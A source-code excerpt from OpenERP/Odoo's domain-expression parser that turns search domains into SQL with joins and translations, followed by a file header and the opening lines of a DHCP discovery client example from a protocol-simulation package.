return [OR_OPERATOR] + done1 + done2, todo2
if domain[0] == OR_OPERATOR:
done1, todo1 = distribute_negate(domain[1:])
done2, todo2 = distribute_negate(todo1)
return [AND_OPERATOR] + done1 + done2, todo2
if not domain:
return []
if domain[0] != NOT_OPERATOR:
return [domain[0]] + distribute_not(domain[1:])
if domain[0] == NOT_OPERATOR:
done, todo = distribute_negate(domain[1:])
return done + distribute_not(todo)
# --------------------------------------------------
# Generic leaf manipulation
# --------------------------------------------------
def _quote(to_quote):
if '"' not in to_quote:
return '"%s"' % to_quote
return to_quote
def generate_table_alias(src_table_alias, joined_tables=[]):
""" Generate a standard table alias name. An alias is generated as following:
- the base is the source table name (that can already be an alias)
- then, each joined table is added in the alias using a 'link field name'
that is used to render unique aliases for a given path
- returns a tuple composed of the alias, and the full table alias to be
added in a from condition with quoting done
Examples:
- src_table_alias='res_users', join_tables=[]:
alias = ('res_users','"res_users"')
- src_model='res_users', join_tables=[(res.partner, 'parent_id')]
alias = ('res_users__parent_id', '"res_partner" as "res_users__parent_id"')
:param model src_table_alias: model source of the alias
:param list joined_tables: list of tuples
(dst_model, link_field)
:return tuple: (table_alias, alias statement for from clause with quotes added)
"""
alias = src_table_alias
if not joined_tables:
return '%s' % alias, '%s' % _quote(alias)
for link in joined_tables:
alias += '__' + link[1]
assert len(alias) < 64, 'Table alias name %s is longer than the 64 characters size accepted by default in postgresql.' % alias
return '%s' % alias, '%s as %s' % (_quote(joined_tables[-1][0]), _quote(alias))
def get_alias_from_query(from_query):
""" :param string from_query: is something like :
- '"res_partner"' OR
- '"res_partner" as "res_users__partner_id"''
"""
from_splitted = from_query.split(' as ')
if len(from_splitted) > 1:
return from_splitted[0].replace('"', ''), from_splitted[1].replace('"', '')
else:
return from_splitted[0].replace('"', ''), from_splitted[0].replace('"', '')
def normalize_leaf(element):
""" Change a term's operator to some canonical form, simplifying later
processing. """
if not is_leaf(element):
return element
left, operator, right = element
original = operator
operator = operator.lower()
if operator == '<>':
operator = '!='
if isinstance(right, bool) and operator in ('in', 'not in'):
_logger.warning("The domain term '%s' should use the '=' or '!=' operator." % ((left, original, right),))
operator = '=' if operator == 'in' else '!='
if isinstance(right, (list, tuple)) and operator in ('=', '!='):
_logger.warning("The domain term '%s' should use the 'in' or 'not in' operator." % ((left, original, right),))
operator = 'in' if operator == '=' else 'not in'
return left, operator, right
def is_operator(element):
""" Test whether an object is a valid domain operator. """
return isinstance(element, basestring) and element in DOMAIN_OPERATORS
def is_leaf(element, internal=False):
""" Test whether an object is a valid domain term:
- is a list or tuple
- with 3 elements
- second element if a valid op
:param tuple element: a leaf in form (left, operator, right)
:param boolean internal: allow or not the 'inselect' internal operator
in the term. This should be always left to False.
Note: OLD TODO change the share wizard to use this function.
"""
INTERNAL_OPS = TERM_OPERATORS + ('<>',)
if internal:
INTERNAL_OPS += ('inselect', 'not inselect')
return (isinstance(element, tuple) or isinstance(element, list)) \
and len(element) == 3 \
and element[1] in INTERNAL_OPS \
and ((isinstance(element[0], basestring) and element[0])
or element in (TRUE_LEAF, FALSE_LEAF))
# --------------------------------------------------
# SQL utils
# --------------------------------------------------
def select_from_where(cr, select_field, from_table, where_field, where_ids, where_operator):
# todo: merge into parent query as sub-query
res = []
if where_ids:
if where_operator in ['<', '>', '>=', '<=']:
cr.execute('SELECT "%s" FROM "%s" WHERE "%s" %s %%s' % \
(select_field, from_table, where_field, where_operator),
(where_ids[0],)) # TODO shouldn't this be min/max(where_ids) ?
res = [r[0] for r in cr.fetchall()]
else: # TODO where_operator is supposed to be 'in'? It is called with child_of...
for i in range(0, len(where_ids), cr.IN_MAX):
subids = where_ids[i:i + cr.IN_MAX]
cr.execute('SELECT "%s" FROM "%s" WHERE "%s" IN %%s' % \
(select_field, from_table, where_field), (tuple(subids),))
res.extend([r[0] for r in cr.fetchall()])
return res
def select_distinct_from_where_not_null(cr, select_field, from_table):
cr.execute('SELECT distinct("%s") FROM "%s" where "%s" is not null' % (select_field, from_table, select_field))
return [r[0] for r in cr.fetchall()]
def get_unaccent_wrapper(cr):
if openerp.modules.registry.RegistryManager.get(cr.dbname).has_unaccent:
return lambda x: "unaccent(%s)" % (x,)
return lambda x: x
# --------------------------------------------------
# ExtendedLeaf class for managing leafs and contexts
# -------------------------------------------------
class ExtendedLeaf(object):
""" Class wrapping a domain leaf, and giving some services and management
features on it. In particular it managed join contexts to be able to
construct queries through multiple models.
"""
# --------------------------------------------------
# Join / Context manipulation
# running examples:
# - res_users.name, like, foo: name is on res_partner, not on res_users
# - res_partner.bank_ids.name, like, foo: bank_ids is a one2many with _auto_join
# - res_partner.state_id.name, like, foo: state_id is a many2one with _auto_join
# A join:
# - link between src_table and dst_table, using src_field and dst_field
# i.e.: inherits: res_users.partner_id = res_partner.id
# i.e.: one2many: res_partner.id = res_partner_bank.partner_id
# i.e.: many2one: res_partner.state_id = res_country_state.id
# - done in the context of a field
# i.e.: inherits: 'partner_id'
# i.e.: one2many: 'bank_ids'
# i.e.: many2one: 'state_id'
# - table names use aliases: initial table followed by the context field
# names, joined using a '__'
# i.e.: inherits: res_partner as res_users__partner_id
# i.e.: one2many: res_partner_bank as res_partner__bank_ids
# i.e.: many2one: res_country_state as res_partner__state_id
# - join condition use aliases
# i.e.: inherits: res_users.partner_id = res_users__partner_id.id
# i.e.: one2many: res_partner.id = res_partner__bank_ids.parr_id
# i.e.: many2one: res_partner.state_id = res_partner__state_id.id
# Variables explanation:
# - src_table: working table before the join
# -> res_users, res_partner, res_partner
# - dst_table: working table after the join
# -> res_partner, res_partner_bank, res_country_state
# - src_table_link_name: field name used to link the src table, not
# necessarily a field (because 'id' is not a field instance)
# i.e.: inherits: 'partner_id', found in the inherits of the current table
# i.e.: one2many: 'id', not a field
# i.e.: many2one: 'state_id', the current field name
# - dst_table_link_name: field name used to link the dst table, not
# necessarily a field (because 'id' is not a field instance)
# i.e.: inherits: 'id', not a field
# i.e.: one2many: 'partner_id', _fields_id of the current field
# i.e.: many2one: 'id', not a field
# - context_field_name: field name used as a context to make the alias
# i.e.: inherits: 'partner_id': found in the inherits of the current table
# i.e.: one2many: 'bank_ids': current field name
# i.e.: many2one: 'state_id': current field name
# --------------------------------------------------
def __init__(self, leaf, model, join_context=None):
""" Initialize the ExtendedLeaf
:attr [string, tuple] leaf: operator or tuple-formatted domain
expression
:attr obj model: current working model
:attr list _models: list of chained models, updated when
adding joins
:attr list join_context: list of join contexts. This is a list of
tuples like ``(lhs, table, lhs_col, col, link)``
where
lhs
source (left hand) model
model
destination (right hand) model
lhs_col
source model column for join condition
col
destination model column for join condition
link
link column between source and destination model
that is not necessarily (but generally) a real column used
in the condition (i.e. in many2one); this link is used to
compute aliases
"""
assert isinstance(model, BaseModel), 'Invalid leaf creation without table'
self.join_context = join_context or []
self.leaf = leaf
# normalize the leaf's operator
self.normalize_leaf()
# set working variables; handle the context stack and previous tables
self.model = model
self._models = []
for item in self.join_context:
self._models.append(item[0])
self._models.append(model)
# check validity
self.check_leaf()
def __str__(self):
return '<osv.ExtendedLeaf: %s on %s (ctx: %s)>' % (str(self.leaf), self.model._table, ','.join(self._get_context_debug()))
def generate_alias(self):
links = [(context[1]._table, context[4]) for context in self.join_context]
alias, alias_statement = generate_table_alias(self._models[0]._table, links)
return alias
def add_join_context(self, model, lhs_col, table_col, link):
""" See above comments for more details. A join context is a tuple like:
``(lhs, model, lhs_col, col, link)``
After adding the join, the model of the current leaf is updated.
"""
self.join_context.append((self.model, model, lhs_col, table_col, link))
self._models.append(model)
self.model = model
def get_join_conditions(self):
conditions = []
alias = self._models[0]._table
for context in self.join_context:
previous_alias = alias
alias += '__' + context[4]
conditions.append('"%s"."%s"="%s"."%s"' % (previous_alias, context[2], alias, context[3]))
return conditions
def get_tables(self):
tables = set()
links = []
for context in self.join_context:
links.append((context[1]._table, context[4]))
alias, alias_statement = generate_table_alias(self._models[0]._table, links)
tables.add(alias_statement)
return tables
def _get_context_debug(self):
names = ['"%s"."%s"="%s"."%s" (%s)' % (item[0]._table, item[2], item[1]._table, item[3], item[4]) for item in self.join_context]
return names
# --------------------------------------------------
# Leaf manipulation
# --------------------------------------------------
def check_leaf(self):
""" Leaf validity rules:
- a valid leaf is an operator or a leaf
- a valid leaf has a field objects unless
- it is not a tuple
- it is an inherited field
- left is id, operator is 'child_of'
- left is in MAGIC_COLUMNS
"""
if not is_operator(self.leaf) and not is_leaf(self.leaf, True):
raise ValueError("Invalid leaf %s" % str(self.leaf))
def is_operator(self):
return is_operator(self.leaf)
def is_true_leaf(self):
return self.leaf == TRUE_LEAF
def is_false_leaf(self):
return self.leaf == FALSE_LEAF
def is_leaf(self, internal=False):
return is_leaf(self.leaf, internal=internal)
def normalize_leaf(self):
self.leaf = normalize_leaf(self.leaf)
return True
def create_substitution_leaf(leaf, new_elements, new_model=None):
""" From a leaf, create a new leaf (based on the new_elements tuple
and new_model), that will have the same join context. Used to
insert equivalent leafs in the processing stack. """
if new_model is None:
new_model = leaf.model
new_join_context = [tuple(context) for context in leaf.join_context]
new_leaf = ExtendedLeaf(new_elements, new_model, join_context=new_join_context)
return new_leaf
class expression(object):
""" Parse a domain expression
Use a real polish notation
Leafs are still in a ('foo', '=', 'bar') format
For more info: http://christophe-simonis-at-tiny.blogspot.com/2008/08/new-new-domain-notation.html
"""
def __init__(self, cr, uid, exp, table, context):
""" Initialize expression object and automatically parse the expression
right after initialization.
:param exp: expression (using domain ('foo', '=', 'bar' format))
:param table: root model
:attr list result: list that will hold the result of the parsing
as a list of ExtendedLeaf
:attr list joins: list of join conditions, such as
(res_country_state."id" = res_partner."state_id")
:attr root_model: base model for the query
:attr list expression: the domain expression, that will be normalized
and prepared
"""
self._unaccent = get_unaccent_wrapper(cr)
self.joins = []
self.root_model = table
# normalize and prepare the expression for parsing
self.expression = distribute_not(normalize_domain(exp))
# parse the domain expression
self.parse(cr, uid, context=context)
# ----------------------------------------
# Leafs management
# ----------------------------------------
def get_tables(self):
""" Returns the list of tables for SQL queries, like select from ... """
tables = []
for leaf in self.result:
for table in leaf.get_tables():
if table not in tables:
tables.append(table)
table_name = _quote(self.root_model._table)
if table_name not in tables:
tables.append(table_name)
return tables
# ----------------------------------------
# Parsing
# ----------------------------------------
def parse(self, cr, uid, context):
""" Transform the leaves of the expression
The principle is to pop elements from a leaf stack one at a time.
Each leaf is processed. The processing is a if/elif list of various
cases that appear in the leafs (many2one, function fields, ...).
Two things can happen as a processing result:
- the leaf has been modified and/or new leafs have to be introduced
in the expression; they are pushed into the leaf stack, to be
processed right after
- the leaf is added to the result
Some internal var explanation:
:var list path: left operand seen as a sequence of field names
("foo.bar" -> ["foo", "bar"])
:var obj model: model object, model containing the field
(the name provided in the left operand)
:var obj field: the field corresponding to `path[0]`
:var obj column: the column corresponding to `path[0]`
:var obj comodel: relational model of field (field.comodel)
(res_partner.bank_ids -> res.partner.bank)
"""
def to_ids(value, comodel, context=None, limit=None):
""" Normalize a single id or name, or a list of those, into a list of ids
:param {int,long,basestring,list,tuple} value:
if int, long -> return [value]
if basestring, convert it into a list of basestrings, then
if list of basestring ->
perform a name_search on comodel for each name
return the list of related ids
"""
names = []
if isinstance(value, basestring):
names = [value]
elif value and isinstance(value, (tuple, list)) and all(isinstance(item, basestring) for item in value):
names = value
elif isinstance(value, (int, long)):
return [value]
if names:
name_get_list = [name_get[0] for name in names for name_get in comodel.name_search(cr, uid, name, [], 'ilike', context=context, limit=limit)]
return list(set(name_get_list))
return list(value)
def child_of_domain(left, ids, left_model, parent=None, prefix='', context=None):
""" Return a domain implementing the child_of operator for [(left,child_of,ids)],
either as a range using the parent_left/right tree lookup fields
(when available), or as an expanded [(left,in,child_ids)] """
if left_model._parent_store and (not left_model.pool._init):
# TODO: Improve where joins are implemented for many with '.', replace by:
# doms += ['&',(prefix+'.parent_left','<',o.parent_right),(prefix+'.parent_left','>=',o.parent_left)]
doms = []
for o in left_model.browse(cr, uid, ids, context=context):
if doms:
doms.insert(0, OR_OPERATOR)
doms += [AND_OPERATOR, ('parent_left', '<', o.parent_right), ('parent_left', '>=', o.parent_left)]
if prefix:
return [(left, 'in', left_model.search(cr, uid, doms, context=context))]
return doms
else:
def recursive_children(ids, model, parent_field):
if not ids:
return []
ids2 = model.search(cr, uid, [(parent_field, 'in', ids)], context=context)
return ids + recursive_children(ids2, model, parent_field)
return [(left, 'in', recursive_children(ids, left_model, parent or left_model._parent_name))]
def pop():
""" Pop a leaf to process. """
return self.stack.pop()
def push(leaf):
""" Push a leaf to be processed right after. """
self.stack.append(leaf)
def push_result(leaf):
""" Push a leaf to the results. This leaf has been fully processed
and validated. """
self.result.append(leaf)
self.result = []
self.stack = [ExtendedLeaf(leaf, self.root_model) for leaf in self.expression]
# process from right to left; expression is from left to right
self.stack.reverse()
while self.stack:
# Get the next leaf to process
leaf = pop()
# Get working variables
if leaf.is_operator():
left, operator, right = leaf.leaf, None, None
elif leaf.is_true_leaf() or leaf.is_false_leaf():
# because we consider left as a string
left, operator, right = ('%s' % leaf.leaf[0], leaf.leaf[1], leaf.leaf[2])
else:
left, operator, right = leaf.leaf
path = left.split('.', 1)
model = leaf.model
field = model._fields.get(path[0])
column = model._columns.get(path[0])
comodel = model.pool.get(getattr(field, 'comodel_name', None))
# ----------------------------------------
# SIMPLE CASE
# 1. leaf is an operator
# 2. leaf is a true/false leaf
# -> add directly to result
# ----------------------------------------
if leaf.is_operator() or leaf.is_true_leaf() or leaf.is_false_leaf():
push_result(leaf)
# ----------------------------------------
# FIELD NOT FOUND
# -> from inherits'd fields -> work on the related model, and add
# a join condition
# -> ('id', 'child_of', '..') -> use a 'to_ids'
# -> but is one on the _log_access special fields, add directly to
# result
# TODO: make these fields explicitly available in self.columns instead!
# -> else: crash
# ----------------------------------------
elif not column and path[0] in model._inherit_fields:
# comments about inherits'd fields
# { 'field_name': ('parent_model', 'm2o_field_to_reach_parent',
# field_column_obj, origina_parent_model), ... }
next_model = model.pool[model._inherit_fields[path[0]][0]]
leaf.add_join_context(next_model, model._inherits[next_model._name], 'id', model._inherits[next_model._name])
push(leaf)
elif left == 'id' and operator == 'child_of':
ids2 = to_ids(right, model, context)
dom = child_of_domain(left, ids2, model)
for dom_leaf in reversed(dom):
new_leaf = create_substitution_leaf(leaf, dom_leaf, model)
push(new_leaf)
elif not column and path[0] in MAGIC_COLUMNS:
push_result(leaf)
elif not field:
raise ValueError("Invalid field %r in leaf %r" % (left, str(leaf)))
# ----------------------------------------
# PATH SPOTTED
# -> many2one or one2many with _auto_join:
# - add a join, then jump into linked column: column.remaining on
# src_table is replaced by remaining on dst_table, and set for re-evaluation
# - if a domain is defined on the column, add it into evaluation
# on the relational table
# -> many2one, many2many, one2many: replace by an equivalent computed
# domain, given by recursively searching on the remaining of the path
# -> note: hack about columns.property should not be necessary anymore
# as after transforming the column, it will go through this loop once again
# ----------------------------------------
elif len(path) > 1 and column._type == 'many2one' and column._auto_join:
# res_partner.state_id = res_partner__state_id.id
leaf.add_join_context(comodel, path[0], 'id', path[0])
push(create_substitution_leaf(leaf, (path[1], operator, right), comodel))
elif len(path) > 1 and column._type == 'one2many' and column._auto_join:
# res_partner.id = res_partner__bank_ids.partner_id
leaf.add_join_context(comodel, 'id', column._fields_id, path[0])
domain = column._domain(model) if callable(column._domain) else column._domain
push(create_substitution_leaf(leaf, (path[1], operator, right), comodel))
if domain:
domain = normalize_domain(domain)
for elem in reversed(domain):
push(create_substitution_leaf(leaf, elem, comodel))
push(create_substitution_leaf(leaf, AND_OPERATOR, comodel))
elif len(path) > 1 and column._auto_join:
raise NotImplementedError('_auto_join attribute not supported on many2many column %s' % left)
elif len(path) > 1 and column._type == 'many2one':
right_ids = comodel.search(cr, uid, [(path[1], operator, right)], context=context)
leaf.leaf = (path[0], 'in', right_ids)
push(leaf)
# Making search easier when there is a left operand as column.o2m or column.m2m
elif len(path) > 1 and column._type in ['many2many', 'one2many']:
right_ids = comodel.search(cr, uid, [(path[1], operator, right)], context=context)
table_ids = model.search(cr, uid, [(path[0], 'in', right_ids)], context=dict(context, active_test=False))
leaf.leaf = ('id', 'in', table_ids)
push(leaf)
elif not column:
# Non-stored field should provide an implementation of search.
if not field.search:
# field does not support search!
_logger.error("Non-stored field %s cannot be searched.", field)
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug(''.join(traceback.format_stack()))
# Ignore it: generate a dummy leaf.
domain = []
else:
# Let the field generate a domain.
recs = model.browse(cr, uid, [], context)
domain = field.determine_domain(recs, operator, right)
if not domain:
leaf.leaf = TRUE_LEAF
push(leaf)
else:
for elem in reversed(domain):
push(create_substitution_leaf(leaf, elem, model))
# -------------------------------------------------
# FUNCTION FIELD
# -> not stored: error if no _fnct_search, otherwise handle the result domain
# -> stored: management done in the remaining of parsing
# -------------------------------------------------
elif isinstance(column, fields.function) and not column.store:
# this is a function field that is not stored
if not column._fnct_search:
_logger.error(
"Field '%s' (%s) can not be searched: "
"non-stored function field without fnct_search",
column.string, left)
# avoid compiling stack trace if not needed
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug(''.join(traceback.format_stack()))
# ignore it: generate a dummy leaf
fct_domain = []
else:
fct_domain = column.search(cr, uid, model, left, [leaf.leaf], context=context)
if not fct_domain:
leaf.leaf = TRUE_LEAF
push(leaf)
else:
# we assume that the expression is valid
# we create a dummy leaf for forcing the parsing of the resulting expression
for domain_element in reversed(fct_domain):
push(create_substitution_leaf(leaf, domain_element, model))
# self.push(create_substitution_leaf(leaf, TRUE_LEAF, model))
# self.push(create_substitution_leaf(leaf, AND_OPERATOR, model))
# -------------------------------------------------
# RELATIONAL FIELDS
# -------------------------------------------------
# Applying recursivity on field(one2many)
elif column._type == 'one2many' and operator == 'child_of':
ids2 = to_ids(right, comodel, context)
if column._obj != model._name:
dom = child_of_domain(left, ids2, comodel, prefix=column._obj)
else:
dom = child_of_domain('id', ids2, model, parent=left)
for dom_leaf in reversed(dom):
push(create_substitution_leaf(leaf, dom_leaf, model))
elif column._type == 'one2many':
call_null = True
if right is not False:
if isinstance(right, basestring):
ids2 = [x[0] for x in comodel.name_search(cr, uid, right, [], operator, context=context, limit=None)]
if ids2:
operator = 'in'
elif isinstance(right, collections.Iterable):
ids2 = right
else:
ids2 = [right]
if not ids2:
if operator in ['like', 'ilike', 'in', '=']:
#no result found with given search criteria
call_null = False
push(create_substitution_leaf(leaf, FALSE_LEAF, model))
else:
ids2 = select_from_where(cr, column._fields_id, comodel._table, 'id', ids2, operator)
if ids2:
call_null = False
o2m_op = 'not in' if operator in NEGATIVE_TERM_OPERATORS else 'in'
push(create_substitution_leaf(leaf, ('id', o2m_op, ids2), model))
if call_null:
o2m_op = 'in' if operator in NEGATIVE_TERM_OPERATORS else 'not in'
push(create_substitution_leaf(leaf, ('id', o2m_op, select_distinct_from_where_not_null(cr, column._fields_id, comodel._table)), model))
elif column._type == 'many2many':
rel_table, rel_id1, rel_id2 = column._sql_names(model)
#FIXME
if operator == 'child_of':
def _rec_convert(ids):
if comodel == model:
return ids
return select_from_where(cr, rel_id1, rel_table, rel_id2, ids, operator)
ids2 = to_ids(right, comodel, context)
dom = child_of_domain('id', ids2, comodel)
ids2 = comodel.search(cr, uid, dom, context=context)
push(create_substitution_leaf(leaf, ('id', 'in', _rec_convert(ids2)), model))
else:
call_null_m2m = True
if right is not False:
if isinstance(right, basestring):
res_ids = [x[0] for x in comodel.name_search(cr, uid, right, [], operator, context=context)]
if res_ids:
operator = 'in'
else:
if not isinstance(right, list):
res_ids = [right]
else:
res_ids = right
if not res_ids:
if operator in ['like', 'ilike', 'in', '=']:
#no result found with given search criteria
call_null_m2m = False
push(create_substitution_leaf(leaf, FALSE_LEAF, model))
else:
operator = 'in' # operator changed because ids are directly related to main object
else:
call_null_m2m = False
m2m_op = 'not in' if operator in NEGATIVE_TERM_OPERATORS else 'in'
push(create_substitution_leaf(leaf, ('id', m2m_op, select_from_where(cr, rel_id1, rel_table, rel_id2, res_ids, operator) or [0]), model))
if call_null_m2m:
m2m_op = 'in' if operator in NEGATIVE_TERM_OPERATORS else 'not in'
push(create_substitution_leaf(leaf, ('id', m2m_op, select_distinct_from_where_not_null(cr, rel_id1, rel_table)), model))
elif column._type == 'many2one':
if operator == 'child_of':
ids2 = to_ids(right, comodel, context)
if column._obj != model._name:
dom = child_of_domain(left, ids2, comodel, prefix=column._obj)
else:
dom = child_of_domain('id', ids2, model, parent=left)
for dom_leaf in reversed(dom):
push(create_substitution_leaf(leaf, dom_leaf, model))
else:
def _get_expression(comodel, cr, uid, left, right, operator, context=None):
if context is None:
context = {}
c = context.copy()
c['active_test'] = False
#Special treatment to ill-formed domains
operator = (operator in ['<', '>', '<=', '>=']) and 'in' or operator
dict_op = {'not in': '!=', 'in': '=', '=': 'in', '!=': 'not in'}
if isinstance(right, tuple):
right = list(right)
if (not isinstance(right, list)) and operator in ['not in', 'in']:
operator = dict_op[operator]
elif isinstance(right, list) and operator in ['!=', '=']: # for domain (FIELD,'=',['value1','value2'])
operator = dict_op[operator]
res_ids = [x[0] for x in comodel.name_search(cr, uid, right, [], operator, limit=None, context=c)]
if operator in NEGATIVE_TERM_OPERATORS:
res_ids.append(False) # TODO this should not be appended if False was in 'right'
return left, 'in', res_ids
# resolve string-based m2o criterion into IDs
if isinstance(right, basestring) or \
right and isinstance(right, (tuple, list)) and all(isinstance(item, basestring) for item in right):
push(create_substitution_leaf(leaf, _get_expression(comodel, cr, uid, left, right, operator, context=context), model))
else:
# right == [] or right == False and all other cases are handled by __leaf_to_sql()
push_result(leaf)
# -------------------------------------------------
# OTHER FIELDS
# -> datetime fields: manage time part of the datetime
# column when it is not there
# -> manage translatable fields
# -------------------------------------------------
else:
if column._type == 'datetime' and right and len(right) == 10:
if operator in ('>', '<='):
right += ' 23:59:59'
else:
right += ' 00:00:00'
push(create_substitution_leaf(leaf, (left, operator, right), model))
elif column.translate and right:
need_wildcard = operator in ('like', 'ilike', 'not like', 'not ilike')
sql_operator = {'=like': 'like', '=ilike': 'ilike'}.get(operator, operator)
if need_wildcard:
right = '%%%s%%' % right
inselect_operator = 'inselect'
if sql_operator in NEGATIVE_TERM_OPERATORS:
# negate operator (fix lp:1071710)
sql_operator = sql_operator[4:] if sql_operator[:3] == 'not' else '='
inselect_operator = 'not inselect'
unaccent = self._unaccent if sql_operator.endswith('like') else lambda x: x
instr = unaccent('%s')
if sql_operator == 'in':
# params will be flatten by to_sql() => expand the placeholders
instr = '(%s)' % ', '.join(['%s'] * len(right))
subselect = """WITH temp_irt_current (id, name) as (
SELECT ct.id, coalesce(it.value,ct.{quote_left})
FROM {current_table} ct
LEFT JOIN ir_translation it ON (it.name = %s and
it.lang = %s and
it.type = %s and
it.res_id = ct.id and
it.value != '')
)
SELECT id FROM temp_irt_current WHERE {name} {operator} {right} order by name
""".format(current_table=model._table, quote_left=_quote(left), name=unaccent('name'),
operator=sql_operator, right=instr)
params = (
model._name + ',' + left,
context.get('lang') or 'en_US',
'model',
right,
)
push(create_substitution_leaf(leaf, ('id', inselect_operator, (subselect, params)), model))
else:
push_result(leaf)
# ----------------------------------------
# END OF PARSING FULL DOMAIN
# -> generate joins
# ----------------------------------------
joins = set()
for leaf in self.result:
joins |= set(leaf.get_join_conditions())
self.joins = list(joins)
def __leaf_to_sql(self, eleaf):
model = eleaf.model
leaf = eleaf.leaf
left, operator, right = leaf
# final sanity checks - should never fail
assert operator in (TERM_OPERATORS + ('inselect', 'not inselect')), \
"Invalid operator %r in domain term %r" % (operator, leaf)
assert leaf in (TRUE_LEAF, FALSE_LEAF) or left in model._fields \
or left in MAGIC_COLUMNS, "Invalid field %r in domain term %r" % (left, leaf)
assert not isinstance(right, BaseModel), \
"Invalid value %r in domain term %r" % (right, leaf)
table_alias = '"%s"' % (eleaf.generate_alias())
if leaf == TRUE_LEAF:
query = 'TRUE'
params = []
elif leaf == FALSE_LEAF:
query = 'FALSE'
params = []
elif operator == 'inselect':
query = '(%s."%s" in (%s))' % (table_alias, left, right[0])
params = right[1]
elif operator == 'not inselect':
query = '(%s."%s" not in (%s))' % (table_alias, left, right[0])
params = right[1]
elif operator in ['in', 'not in']:
# Two cases: right is a boolean or a list. The boolean case is an
# abuse and handled for backward compatibility.
if isinstance(right, bool):
_logger.warning("The domain term '%s' should use the '=' or '!=' operator." % (leaf,))
if operator == 'in':
r = 'NOT NULL' if right else 'NULL'
else:
r = 'NULL' if right else 'NOT NULL'
query = '(%s."%s" IS %s)' % (table_alias, left, r)
params = []
elif isinstance(right, (list, tuple)):
params = list(right)
check_nulls = False
for i in range(len(params))[::-1]:
if params[i] == False:
check_nulls = True
del params[i]
if params:
if left == 'id':
instr = ','.join(['%s'] * len(params))
else:
ss = model._columns[left]._symbol_set
instr = ','.join([ss[0]] * len(params))
params = map(ss[1], params)
query = '(%s."%s" %s (%s))' % (table_alias, left, operator, instr)
else:
# The case for (left, 'in', []) or (left, 'not in', []).
query = 'FALSE' if operator == 'in' else 'TRUE'
if check_nulls and operator == 'in':
query = '(%s OR %s."%s" IS NULL)' % (query, table_alias, left)
elif not check_nulls and operator == 'not in':
query = '(%s OR %s."%s" IS NULL)' % (query, table_alias, left)
elif check_nulls and operator == 'not in':
query = '(%s AND %s."%s" IS NOT NULL)' % (query, table_alias, left) # needed only for TRUE.
else: # Must not happen
raise ValueError("Invalid domain term %r" % (leaf,))
elif right == False and (left in model._columns) and model._columns[left]._type == "boolean" and (operator == '='):
query = '(%s."%s" IS NULL or %s."%s" = false )' % (table_alias, left, table_alias, left)
params = []
elif (right is False or right is None) and (operator == '='):
query = '%s."%s" IS NULL ' % (table_alias, left)
params = []
elif right == False and (left in model._columns) and model._columns[left]._type == "boolean" and (operator == '!='):
query = '(%s."%s" IS NOT NULL and %s."%s" != false)' % (table_alias, left, table_alias, left)
params = []
elif (right is False or right is None) and (operator == '!='):
query = '%s."%s" IS NOT NULL' % (table_alias, left)
params = []
elif operator == '=?':
if right is False or right is None:
# '=?' is a short-circuit that makes the term TRUE if right is None or False
query = 'TRUE'
params = []
else:
# '=?' behaves like '=' in other cases
query, params = self.__leaf_to_sql(
create_substitution_leaf(eleaf, (left, '=', right), model))
elif left == 'id':
query = '%s.id %s %%s' % (table_alias, operator)
params = right
else:
need_wildcard = operator in ('like', 'ilike', 'not like', 'not ilike')
sql_operator = {'=like': 'like', '=ilike': 'ilike'}.get(operator, operator)
cast = '::text' if sql_operator.endswith('like') else ''
if left in model._columns:
format = need_wildcard and '%s' or model._columns[left]._symbol_set[0]
unaccent = self._unaccent if sql_operator.endswith('like') else lambda x: x
column = '%s.%s' % (table_alias, _quote(left))
query = '(%s %s %s)' % (unaccent(column + cast), sql_operator, unaccent(format))
elif left in MAGIC_COLUMNS:
query = "(%s.\"%s\"%s %s %%s)" % (table_alias, left, cast, sql_operator)
params = right
else: # Must not happen
raise ValueError("Invalid field %r in domain term %r" % (left, leaf))
add_null = False
if need_wildcard:
if isinstance(right, str):
str_utf8 = right
elif isinstance(right, unicode):
str_utf8 = right.encode('utf-8')
else:
str_utf8 = str(right)
params = '%%%s%%' % str_utf8
add_null = not str_utf8
elif left in model._columns:
params = model._columns[left]._symbol_set[1](right)
if add_null:
query = '(%s OR %s."%s" IS NULL)' % (query, table_alias, left)
if isinstance(params, basestring):
params = [params]
return query, params
def to_sql(self):
stack = []
params = []
# Process the domain from right to left, using a stack, to generate a SQL expression.
self.result.reverse()
for leaf in self.result:
if leaf.is_leaf(internal=True):
q, p = self.__leaf_to_sql(leaf)
params.insert(0, p)
stack.append(q)
elif leaf.leaf == NOT_OPERATOR:
stack.append('(NOT (%s))' % (stack.pop(),))
else:
ops = {AND_OPERATOR: ' AND ', OR_OPERATOR: ' OR '}
q1 = stack.pop()
q2 = stack.pop()
stack.append('(%s %s %s)' % (q1, ops[leaf.leaf], q2,))
assert len(stack) == 1
query = stack[0]
joins = ' AND '.join(self.joins)
if joins:
query = '(%s) AND %s' % (joins, query)
return query, tools.flatten(params)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
marcosbontempo/algar
|
refs/heads/master
|
pyprotosim-0.3.2/pyprotosim/example/dhcp_OK.py
|
3
|
#!/usr/bin/env python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# February 2012 - September 2012
# Version 0.2.8, Last change on Sep 25, 2012
# This software is distributed under the terms of BSD license.
##################################################################
import sys
import socket
import IN
if __name__ == "__main__":
LOCAL_PORT=68
SERVER_PORT=67
LOCAL_IP="0.0.0.0"
BCAST_IP="255.255.255.255"
LISTEN_DEV="eth3"
MSG_SIZE=2048
###########################################################
Conn=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# socket is in blocking mode, so let's add a timeout
Conn.settimeout(3)
# Bind to Device
Conn.setsockopt(socket.SOL_SOCKET,IN.SO_BINDTODEVICE,LISTEN_DEV+'\0')
# Enable ReuseAddr & Broadcast
Conn.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
Conn.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST,1)
# Bind to Address
Conn.bind(('', LOCAL_PORT))
##########################################################
# Create DHCP-Discovery
MAC="E83935BDAB2A"
